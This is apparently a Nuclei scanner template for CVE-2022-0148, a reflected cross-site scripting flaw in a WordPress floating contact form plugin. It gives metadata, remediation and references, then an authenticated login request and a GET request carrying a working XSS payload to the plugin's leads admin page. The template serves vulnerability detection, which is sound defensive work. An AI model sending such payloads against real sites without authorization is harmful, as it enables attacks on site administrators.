id: CVE-2022-0148 info: name: WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting author: DhiyaneshDK severity: medium description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page. remediation: | Update the WordPress All-in-one Floating Contact Form plugin to version 2.0.4 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148 - https://plugins.trac.wordpress.org/changeset/2654453/mystickyelements - https://nvd.nist.gov/vuln/detail/CVE-2022-0148 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0148 cwe-id: CWE-79 epss-score: 0.00144 epss-percentile: 0.49973 cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: premio product: mystickyelements framework: wordpress tags: xss,wp-plugin,authenticated,wpscan,cve,cve2022,wordpress http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100d2c8f23438023e7695a91868376f01b01b7a609420016fb68b4f572df33f2978022100cbabccc4887965ddd2e9301719fe4305ef2402d42c329060ff8de446a1e5d06e:922c64590222798bb761d5b6d8e72950